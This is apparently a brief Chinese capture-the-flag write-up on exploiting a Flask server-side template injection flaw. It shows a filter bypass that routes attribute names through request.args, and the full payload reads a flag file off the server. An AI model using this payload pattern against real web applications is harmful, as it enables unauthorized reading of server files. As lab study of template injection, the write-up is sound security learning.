进入页面看到给出一个目录
访问后给出flag的目录
测试发现存在SSTI漏洞
发现存在过滤
但是并未过滤request,request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象(flask.request ) " 。
利用file类读取文件
最终payload:
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read
本文介绍了一种利用服务器侧模板注入(SSTI)漏洞的方法,并通过具体案例展示了如何构造payload来读取服务器上的文件。该过程涉及对Flask框架的理解及利用request全局对象进行攻击。
3057

被折叠的 条评论
为什么被折叠?



